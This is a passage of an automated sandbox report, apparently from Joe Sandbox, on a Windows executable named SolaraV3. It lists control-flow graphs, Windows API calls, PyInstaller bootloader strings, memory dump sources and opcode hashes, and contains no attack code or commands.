                                                                                                                                                                                                                              control_flow_graph 601 7ff6dc701210-7ff6dc70126d call 7ff6dc70bd80 604 7ff6dc70126f-7ff6dc701296 call 7ff6dc702710 601->604 605 7ff6dc701297-7ff6dc7012af call 7ff6dc714f44 601->605 610 7ff6dc7012d4-7ff6dc7012e4 call 7ff6dc714f44 605->610 611 7ff6dc7012b1-7ff6dc7012cf call 7ff6dc714f08 call 7ff6dc702910 605->611 617 7ff6dc701309-7ff6dc70131b 610->617 618 7ff6dc7012e6-7ff6dc701304 call 7ff6dc714f08 call 7ff6dc702910 610->618 623 7ff6dc701439-7ff6dc70146d call 7ff6dc70ba60 call 7ff6dc714f30 * 2 611->623 619 7ff6dc701320-7ff6dc701345 call 7ff6dc71039c 617->619 618->623 629 7ff6dc701431 619->629 630 7ff6dc70134b-7ff6dc701355 call 7ff6dc710110 619->630 629->623 630->629 637 7ff6dc70135b-7ff6dc701367 630->637 639 7ff6dc701370-7ff6dc701398 call 7ff6dc70a1c0 637->639 642 7ff6dc70139a-7ff6dc70139d 639->642 643 7ff6dc701416-7ff6dc70142c call 7ff6dc702710 639->643 644 7ff6dc701411 642->644 645 7ff6dc70139f-7ff6dc7013a9 642->645 643->629 644->643 647 7ff6dc7013d4-7ff6dc7013d7 645->647 648 7ff6dc7013ab-7ff6dc7013b9 call 7ff6dc710adc 645->648 649 7ff6dc7013ea-7ff6dc7013ef 647->649 650 7ff6dc7013d9-7ff6dc7013e7 call 7ff6dc729e30 647->650 654 7ff6dc7013be-7ff6dc7013c1 648->654 649->639 653 7ff6dc7013f5-7ff6dc7013f8 649->653 650->649 658 7ff6dc70140c-7ff6dc70140f 653->658 659 7ff6dc7013fa-7ff6dc7013fd 653->659 655 7ff6dc7013c3-7ff6dc7013cd call 7ff6dc710110 654->655 656 7ff6dc7013cf-7ff6dc7013d2 654->656 655->649 655->656 656->643 658->629 659->643 661 7ff6dc7013ff-7ff6dc701407 659->661 661->619
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                              • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                              • Opcode ID: ab383ac4b995131bdd40696453c0f16ebeee9cffe796343d9728e2385cbc1d23
                                                                                                                                                                                                                              • Instruction ID: 86cdcb7e46f9813f34b6f86ac8c5fc4ab10b663316dd619ccc43144b47be829d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ab383ac4b995131bdd40696453c0f16ebeee9cffe796343d9728e2385cbc1d23
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 05510822B0864A86E6219B16E4503BEA2A1FF84794F484137ED4EC77D9EF3DE563D700

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF6DC71F0AA,?,?,-00000018,00007FF6DC71AD53,?,?,?,00007FF6DC71AC4A,?,?,?,00007FF6DC715F3E), ref: 00007FF6DC71EE8C
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF6DC71F0AA,?,?,-00000018,00007FF6DC71AD53,?,?,?,00007FF6DC71AC4A,?,?,?,00007FF6DC715F3E), ref: 00007FF6DC71EE98
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                              • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                              • API String ID: 3013587201-537541572
                                                                                                                                                                                                                              • Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                              • Instruction ID: b95b587e12267ab634f70504cc74e22c2a31fd8b6b762ba04f6b51265cf1f776
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8E412C61B1961A42FB26CB1A982467D63A5BF48BD0F885137DD1DC7384DF3CE42B8300

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,00007FF6DC703804), ref: 00007FF6DC7036E1
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF6DC703804), ref: 00007FF6DC7036EB
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DC702C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6DC703706,?,00007FF6DC703804), ref: 00007FF6DC702C9E
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DC702C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6DC703706,?,00007FF6DC703804), ref: 00007FF6DC702D63
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DC702C50: MessageBoxW.USER32 ref: 00007FF6DC702D99
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                              • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                              • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                              • Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                              • Instruction ID: 8e8d371c739a9d7afba1c888563e93fcc3cfd58bc6cd68cabf098d7fbe29a052
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA21C461F1C64A41FE319726E8603BE6260BF98355F804133E66DC26D5EE2DE127D740

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 746 7ff6dc71ba5c-7ff6dc71ba82 747 7ff6dc71ba9d-7ff6dc71baa1 746->747 748 7ff6dc71ba84-7ff6dc71ba98 call 7ff6dc714ee8 call 7ff6dc714f08 746->748 749 7ff6dc71be77-7ff6dc71be83 call 7ff6dc714ee8 call 7ff6dc714f08 747->749 750 7ff6dc71baa7-7ff6dc71baae 747->750 762 7ff6dc71be8e 748->762 769 7ff6dc71be89 call 7ff6dc71a8e0 749->769 750->749 752 7ff6dc71bab4-7ff6dc71bae2 750->752 752->749 755 7ff6dc71bae8-7ff6dc71baef 752->755 759 7ff6dc71bb08-7ff6dc71bb0b 755->759 760 7ff6dc71baf1-7ff6dc71bb03 call 7ff6dc714ee8 call 7ff6dc714f08 755->760 765 7ff6dc71bb11-7ff6dc71bb17 759->765 766 7ff6dc71be73-7ff6dc71be75 759->766 760->769 767 7ff6dc71be91-7ff6dc71bea8 762->767 765->766 770 7ff6dc71bb1d-7ff6dc71bb20 765->770 766->767 769->762 770->760 773 7ff6dc71bb22-7ff6dc71bb47 770->773 775 7ff6dc71bb49-7ff6dc71bb4b 773->775 776 7ff6dc71bb7a-7ff6dc71bb81 773->776 779 7ff6dc71bb4d-7ff6dc71bb54 775->779 780 7ff6dc71bb72-7ff6dc71bb78 775->780 777 7ff6dc71bb56-7ff6dc71bb6d call 7ff6dc714ee8 call 7ff6dc714f08 call 7ff6dc71a8e0 776->777 778 7ff6dc71bb83-7ff6dc71bbab call 7ff6dc71d5fc call 7ff6dc71a948 * 2 776->778 810 7ff6dc71bd00 777->810 806 7ff6dc71bbc8-7ff6dc71bbf3 call 7ff6dc71c284 778->806 807 7ff6dc71bbad-7ff6dc71bbc3 call 7ff6dc714f08 call 7ff6dc714ee8 778->807 779->777 779->780 782 7ff6dc71bbf8-7ff6dc71bc0f 780->782 785 7ff6dc71bc8a-7ff6dc71bc94 call 7ff6dc72391c 782->785 786 7ff6dc71bc11-7ff6dc71bc19 782->786 797 7ff6dc71bc9a-7ff6dc71bcaf 785->797 798 7ff6dc71bd1e 785->798 786->785 790 7ff6dc71bc1b-7ff6dc71bc1d 786->790 790->785 794 7ff6dc71bc1f-7ff6dc71bc35 790->794 794->785 799 7ff6dc71bc37-7ff6dc71bc43 794->799 797->798 803 7ff6dc71bcb1-7ff6dc71bcc3 GetConsoleMode 797->803 801 7ff6dc71bd23-7ff6dc71bd43 ReadFile 798->801 799->785 804 7ff6dc71bc45-7ff6dc71bc47 799->804 808 7ff6dc71bd49-7ff6dc71bd51 801->808 809 7ff6dc71be3d-7ff6dc71be46 GetLastError 801->809 803->798 811 7ff6dc71bcc5-7ff6dc71bccd 803->811 804->785 812 7ff6dc71bc49-7ff6dc71bc61 804->812 806->782 807->810 808->809 814 7ff6dc71bd57 808->814 817 7ff6dc71be48-7ff6dc71be5e call 7ff6dc714f08 call 7ff6dc714ee8 809->817 818 7ff6dc71be63-7ff6dc71be66 809->818 819 7ff6dc71bd03-7ff6dc71bd0d call 7ff6dc71a948 810->819 811->801 816 7ff6dc71bccf-7ff6dc71bcf1 ReadConsoleW 811->816 812->785 820 7ff6dc71bc63-7ff6dc71bc6f 812->820 825 7ff6dc71bd5e-7ff6dc71bd73 814->825 827 7ff6dc71bcf3 GetLastError 816->827 828 7ff6dc71bd12-7ff6dc71bd1c 816->828 817->810 822 7ff6dc71bcf9-7ff6dc71bcfb call 7ff6dc714e7c 818->822 823 7ff6dc71be6c-7ff6dc71be6e 818->823 819->767 820->785 821 7ff6dc71bc71-7ff6dc71bc73 820->821 821->785 831 7ff6dc71bc75-7ff6dc71bc85 821->831 822->810 823->819 825->819 833 7ff6dc71bd75-7ff6dc71bd80 825->833 827->822 828->825 831->785 838 7ff6dc71bda7-7ff6dc71bdaf 833->838 839 7ff6dc71bd82-7ff6dc71bd9b call 7ff6dc71b674 833->839 842 7ff6dc71be2b-7ff6dc71be38 call 7ff6dc71b4b4 838->842 843 7ff6dc71bdb1-7ff6dc71bdc3 838->843 846 7ff6dc71bda0-7ff6dc71bda2 839->846 842->846 847 7ff6dc71be1e-7ff6dc71be26 843->847 848 7ff6dc71bdc5 843->848 846->819 847->819 850 7ff6dc71bdca-7ff6dc71bdd1 848->850 851 7ff6dc71be0d-7ff6dc71be18 850->851 852 7ff6dc71bdd3-7ff6dc71bdd7 850->852 851->847 853 7ff6dc71bdd9-7ff6dc71bde0 852->853 854 7ff6dc71bdf3 852->854 853->854 855 7ff6dc71bde2-7ff6dc71bde6 853->855 856 7ff6dc71bdf9-7ff6dc71be09 854->856 855->854 857 7ff6dc71bde8-7ff6dc71bdf1 855->857 856->850 858 7ff6dc71be0b 856->858 857->856 858->847
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: bd5e670e2ac73c9d5051395424effa1a9c5fa8f9f080fcfac4df12f3bd03b0fb
                                                                                                                                                                                                                              • Instruction ID: 99c03d8e260e3d2b49d0a7d6baf5f44e17883e53a85fc31120d4f2919f769fe9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bd5e670e2ac73c9d5051395424effa1a9c5fa8f9f080fcfac4df12f3bd03b0fb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3DC138A2A1C78F81E7618B1D90612BD3B54FB81B90F556133EA4E83795CF7CE46B8740

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 995526605-0
                                                                                                                                                                                                                              • Opcode ID: fa90e23b90d603ff8a1fc3170628a297920662056bab6e12f28c88f429b12389
                                                                                                                                                                                                                              • Instruction ID: 7dcb2c5d61f5f7b020b30dc55f8cc9d1aceded58e25c981b5d6252f48f0b925e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fa90e23b90d603ff8a1fc3170628a297920662056bab6e12f28c88f429b12389
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 88215E31A0C64A42EB208B56F55426EE3B0FF857A0F540336EA6D83BE9DE7DD4668700

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DC708570: GetCurrentProcess.KERNEL32 ref: 00007FF6DC708590
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DC708570: OpenProcessToken.ADVAPI32 ref: 00007FF6DC7085A3
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DC708570: GetTokenInformation.KERNELBASE ref: 00007FF6DC7085C8
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DC708570: GetLastError.KERNEL32 ref: 00007FF6DC7085D2
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DC708570: GetTokenInformation.KERNELBASE ref: 00007FF6DC708612
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DC708570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6DC70862E
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DC708570: CloseHandle.KERNEL32 ref: 00007FF6DC708646
                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,00007FF6DC703C55), ref: 00007FF6DC70916C
                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,00007FF6DC703C55), ref: 00007FF6DC709175
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                              • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                              • API String ID: 6828938-1529539262
                                                                                                                                                                                                                              • Opcode ID: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
                                                                                                                                                                                                                              • Instruction ID: a149f3f94df4df9367260d828c308a77d8474707443fd911e8975ba06f9d8111
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C0214D21A0864A81E610AB11E4252EE6361FF88780F544037EA4D83BD6DF3DD966D740

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 965 7ff6dc71cf60-7ff6dc71cf85 966 7ff6dc71cf8b-7ff6dc71cf8e 965->966 967 7ff6dc71d253 965->967 969 7ff6dc71cfc7-7ff6dc71cff3 966->969 970 7ff6dc71cf90-7ff6dc71cfc2 call 7ff6dc71a814 966->970 968 7ff6dc71d255-7ff6dc71d265 967->968 972 7ff6dc71cffe-7ff6dc71d004 969->972 973 7ff6dc71cff5-7ff6dc71cffc 969->973 970->968 975 7ff6dc71d006-7ff6dc71d00f call 7ff6dc71c320 972->975 976 7ff6dc71d014-7ff6dc71d029 call 7ff6dc72391c 972->976 973->970 973->972 975->976 980 7ff6dc71d02f-7ff6dc71d038 976->980 981 7ff6dc71d143-7ff6dc71d14c 976->981 980->981 984 7ff6dc71d03e-7ff6dc71d042 980->984 982 7ff6dc71d14e-7ff6dc71d154 981->982 983 7ff6dc71d1a0-7ff6dc71d1c5 WriteFile 981->983 985 7ff6dc71d156-7ff6dc71d159 982->985 986 7ff6dc71d18c-7ff6dc71d19e call 7ff6dc71ca18 982->986 989 7ff6dc71d1c7-7ff6dc71d1cd GetLastError 983->989 990 7ff6dc71d1d0 983->990 987 7ff6dc71d053-7ff6dc71d05e 984->987 988 7ff6dc71d044-7ff6dc71d04c call 7ff6dc7147c0 984->988 992 7ff6dc71d178-7ff6dc71d18a call 7ff6dc71cc38 985->992 993 7ff6dc71d15b-7ff6dc71d15e 985->993 1013 7ff6dc71d130-7ff6dc71d137 986->1013 995 7ff6dc71d06f-7ff6dc71d084 GetConsoleMode 987->995 996 7ff6dc71d060-7ff6dc71d069 987->996 988->987 989->990 991 7ff6dc71d1d3 990->991 998 7ff6dc71d1d8 991->998 992->1013 999 7ff6dc71d1e4-7ff6dc71d1ee 993->999 1000 7ff6dc71d164-7ff6dc71d176 call 7ff6dc71cb1c 993->1000 1003 7ff6dc71d08a-7ff6dc71d090 995->1003 1004 7ff6dc71d13c 995->1004 996->981 996->995 1006 7ff6dc71d1dd 998->1006 1007 7ff6dc71d24c-7ff6dc71d251 999->1007 1008 7ff6dc71d1f0-7ff6dc71d1f5 999->1008 1000->1013 1011 7ff6dc71d096-7ff6dc71d099 1003->1011 1012 7ff6dc71d119-7ff6dc71d12b call 7ff6dc71c5a0 1003->1012 1004->981 1006->999 1007->968 1014 7ff6dc71d1f7-7ff6dc71d1fa 1008->1014 1015 7ff6dc71d223-7ff6dc71d22d 1008->1015 1017 7ff6dc71d09b-7ff6dc71d09e 1011->1017 1018 7ff6dc71d0a4-7ff6dc71d0b2 1011->1018 1012->1013 1013->998 1022 7ff6dc71d1fc-7ff6dc71d20b 1014->1022 1023 7ff6dc71d213-7ff6dc71d21e call 7ff6dc714ec4 1014->1023 1024 7ff6dc71d22f-7ff6dc71d232 1015->1024 1025 7ff6dc71d234-7ff6dc71d243 1015->1025 1017->1006 1017->1018 1020 7ff6dc71d110-7ff6dc71d114 1018->1020 1021 7ff6dc71d0b4 1018->1021 1020->991 1026 7ff6dc71d0b8-7ff6dc71d0cf call 7ff6dc7239e8 1021->1026 1022->1023 1023->1015 1024->967 1024->1025 1025->1007 1031 7ff6dc71d107-7ff6dc71d10d GetLastError 1026->1031 1032 7ff6dc71d0d1-7ff6dc71d0dd 1026->1032 1031->1020 1033 7ff6dc71d0fc-7ff6dc71d103 1032->1033 1034 7ff6dc71d0df-7ff6dc71d0f1 call 7ff6dc7239e8 1032->1034 1033->1020 1036 7ff6dc71d105 1033->1036 1034->1031 1038 7ff6dc71d0f3-7ff6dc71d0fa 1034->1038 1036->1026 1038->1033
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DC71CF4B), ref: 00007FF6DC71D07C
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DC71CF4B), ref: 00007FF6DC71D107
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 953036326-0
                                                                                                                                                                                                                              • Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                              • Instruction ID: d4086e19ec2e577cb964cee3a3ddfca5792207dcce4a95709d42c44aaaa03619
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4691E532F1865A89F7619F6994602BD2BA0BB54BD8F14613BDE0E97684DF3CD463CB00
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1279662727-0
                                                                                                                                                                                                                              • Opcode ID: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                                                                                                                                                                                              • Instruction ID: f2fcf0d37a12b62c590ca901a2d41bc21c043bd6961b1e52981bf9003430a903
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C341A422E1878683E7548B24D56437D7360FB947A4F10A336E69C43AD5DF7CA5F28740
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
